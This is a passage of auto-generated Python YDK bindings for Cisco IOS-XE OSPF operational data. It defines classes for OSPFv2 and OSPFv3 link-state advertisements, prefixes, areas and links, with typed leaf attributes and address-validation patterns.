attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None 
self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 
'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. 
attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): """ OSPF multi\-topology interface augmentation .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value) class Ospfv2Instance(Entity): """ The OSPF instance .. 
attribute:: instance_id (key) The routing instance identifier assigned to the OSPF instance **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: vrf_name The name of the Virtual Routing and Forwarding instance that the OSPF instance is operating within **type**\: str **config**\: False .. attribute:: router_id The router identifer assigned to the OSPF instance **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_area The OSPF area information **type**\: list of :py:class:`Ospfv2Area <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area>` **config**\: False .. attribute:: ospfv2_lsdb_external The external LSDB information **type**\: list of :py:class:`Ospfv2LsdbExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance, self).__init__() self.yang_name = "ospfv2-instance" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['instance_id'] self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))]) self._leafs = OrderedDict([ ('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])), ('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ]) self.instance_id = None self.vrf_name = None self.router_id = None self.ospfv2_area = YList(self) self.ospfv2_lsdb_external = YList(self) self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value) class Ospfv2Area(Entity): """ The OSPF area information .. attribute:: area_id (key) The area identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_lsdb_area The OSPF Link State Database information for this area **type**\: list of :py:class:`Ospfv2LsdbArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea>` **config**\: False .. attribute:: ospfv2_interface A list of interfaces that belong to the area **type**\: list of :py:class:`Ospfv2Interface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__() self.yang_name = "ospfv2-area" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), ("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospfv2_lsdb_area = YList(self) self.ospfv2_interface = YList(self) self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value) class Ospfv2LsdbArea(Entity): """ The OSPF Link State Database information for this area .. attribute:: lsa_type (key) Link State Advertisement type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: lsa_id (key) Link State Advertisement Identifer **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: advertising_router (key) Advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_age The age of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_options The options of the Link State Advertisement **type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>` **config**\: False .. attribute:: lsa_seq_number The sequence number for the Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_checksum The checksum of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: lsa_length The length, in bytes, of the Link State Advertisement **type**\: int **range:** 0..65535 **config**\: False .. attribute:: ospfv2_router_lsa_links The router Link State Advertisement links **type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks>` **config**\: False .. attribute:: unsupported_lsa The unsupported Link State Advertisements **type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa>` **config**\: False .. attribute:: router_lsa The router Link State Advertisements **type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa>` **config**\: False .. attribute:: network_lsa The network Link State Advertisements **type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa>` **config**\: False .. 
attribute:: network_summary_lsa The network summary Link State Advertisements **type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa>` **config**\: False .. attribute:: router_summary_lsa The router summary Link State Advertisements **type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa>` **config**\: False .. attribute:: external_lsa The external Link State Advertisements **type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa>` **config**\: False .. attribute:: nssa_lsa The Not So Stubby Area Link state advertisements **type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__() self.yang_name = "ospfv2-lsdb-area" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", 
OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = 
OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): """ The router Link State Advertisement links .. attribute:: link_type (key) Link Type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id (key) link Identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) link data **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: link_topo Link topology **type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): """ Link topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: topo_metric Topology metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): """ The unsupported Link State Advertisements .. attribute:: lsa_data Link State Advertisement data **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): """ The router Link State Advertisements .. 
attribute:: router_lsa_bits Router Link State Advertisement bits **type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>` **config**\: False .. attribute:: router_lsa_number_links Router Link State Advertisement number of links **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): """ The network Link State Advertisements .. attribute:: network_lsa_mask Network Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. 
